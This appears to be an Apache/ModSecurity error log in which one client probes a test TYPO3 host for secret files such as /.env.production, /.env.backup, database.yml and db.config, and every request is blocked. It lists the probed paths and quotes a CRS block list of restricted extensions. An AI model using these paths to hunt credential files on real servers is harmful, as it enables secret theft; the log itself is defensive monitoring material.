[Mon May 26 22:42:52.552270 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aDTSTFNfyYOYBczX3ejM9QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.staging
[Mon May 26 22:42:52.552562 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aDTSTFNfyYOYBczX3ejM9QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.staging
[Mon May 26 22:42:52.552763 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aDTSTFNfyYOYBczX3ejM9QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.staging
[Mon May 26 22:42:52.981381 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aDTSTFNfyYOYBczX3ejM9gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.backup
[Mon May 26 22:42:52.981568 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aDTSTFNfyYOYBczX3ejM9gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.backup
[Mon May 26 22:42:52.981818 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aDTSTFNfyYOYBczX3ejM9gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.backup
[Mon May 26 22:42:52.982010 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aDTSTFNfyYOYBczX3ejM9gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.backup
[Mon May 26 22:42:53.309027 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aDTSTVNfyYOYBczX3ejM9wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.backup
[Mon May 26 22:42:53.309225 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aDTSTVNfyYOYBczX3ejM9wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.backup
[Mon May 26 22:42:53.309480 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aDTSTVNfyYOYBczX3ejM9wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.backup
[Mon May 26 22:42:53.309670 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aDTSTVNfyYOYBczX3ejM9wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.backup
[Mon May 26 22:42:53.738223 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aDTSTVNfyYOYBczX3ejM-AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.production
[Mon May 26 22:42:53.738521 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aDTSTVNfyYOYBczX3ejM-AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.production
[Mon May 26 22:42:53.738722 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aDTSTVNfyYOYBczX3ejM-AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.production
[Mon May 26 22:42:54.066156 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aDTSTlNfyYOYBczX3ejM-QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.production
[Mon May 26 22:42:54.066459 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aDTSTlNfyYOYBczX3ejM-QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.production
[Mon May 26 22:42:54.066647 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aDTSTlNfyYOYBczX3ejM-QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.production
[Mon May 26 22:42:54.495649 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aDTSTlNfyYOYBczX3ejM-gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.development
[Mon May 26 22:42:54.495916 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aDTSTlNfyYOYBczX3ejM-gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.development
[Mon May 26 22:42:54.496126 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aDTSTlNfyYOYBczX3ejM-gAAAAo"], referer: http://surf.test.indacotrentino.com/.env.development
[Mon May 26 22:42:54.823751 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aDTSTlNfyYOYBczX3ejM-wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.development
[Mon May 26 22:42:54.824020 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aDTSTlNfyYOYBczX3ejM-wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.development
[Mon May 26 22:42:54.824217 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aDTSTlNfyYOYBczX3ejM-wAAAAo"], referer: http://surf.test.indacotrentino.com/.env.development
[Mon May 26 22:42:55.253460 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aDTST1NfyYOYBczX3ejM_AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.prod
[Mon May 26 22:42:55.253733 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aDTST1NfyYOYBczX3ejM_AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.prod
[Mon May 26 22:42:55.253929 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aDTST1NfyYOYBczX3ejM_AAAAAo"], referer: http://surf.test.indacotrentino.com/.env.prod
[Mon May 26 22:42:55.581042 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aDTST1NfyYOYBczX3ejM_QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.prod
[Mon May 26 22:42:55.581319 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aDTST1NfyYOYBczX3ejM_QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.prod
[Mon May 26 22:42:55.581521 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aDTST1NfyYOYBczX3ejM_QAAAAo"], referer: http://surf.test.indacotrentino.com/.env.prod
[Mon May 26 22:42:56.822210 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml, referer: http://surf.test.indacotrentino.com/config.yml
[Mon May 26 22:42:57.149516 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml, referer: http://surf.test.indacotrentino.com/config.yml
[Mon May 26 22:42:57.577794 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml, referer: http://surf.test.indacotrentino.com/config.yaml
[Mon May 26 22:42:57.904670 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml, referer: http://surf.test.indacotrentino.com/config.yaml
[Mon May 26 22:42:58.332878 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.yml, referer: http://surf.test.indacotrentino.com/database.yml
[Mon May 26 22:42:58.659919 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.yml, referer: http://surf.test.indacotrentino.com/database.yml
[Mon May 26 22:43:02.254424 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.yml, referer: http://surf.test.indacotrentino.com/db.yml
[Mon May 26 22:43:02.581724 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.yml, referer: http://surf.test.indacotrentino.com/db.yml
[Mon May 26 22:43:03.010323 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.yaml, referer: http://surf.test.indacotrentino.com/db.yaml
[Mon May 26 22:43:03.337943 2025] [authz_core:error] [pid 3426521] [client 165.1.71.166:44526] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.yaml, referer: http://surf.test.indacotrentino.com/db.yaml
[Mon May 26 22:43:03.767021 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/db.config"] [unique_id "aDTSV1NfyYOYBczX3ejNEgAAAAo"], referer: http://surf.test.indacotrentino.com/db.config
[Mon May 26 22:43:03.767459 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/db.config"] [unique_id "aDTSV1NfyYOYBczX3ejNEgAAAAo"], referer: http://surf.test.indacotrentino.com/db.config
[Mon May 26 22:43:03.767639 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/db.config"] [unique_id "aDTSV1NfyYOYBczX3ejNEgAAAAo"], referer: http://surf.test.indacotrentino.com/db.config
[Mon May 26 22:43:04.095186 2025] [:error] [pid 3426521] [client 165.1.71.166:44526] [client 165.1.71.166] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri 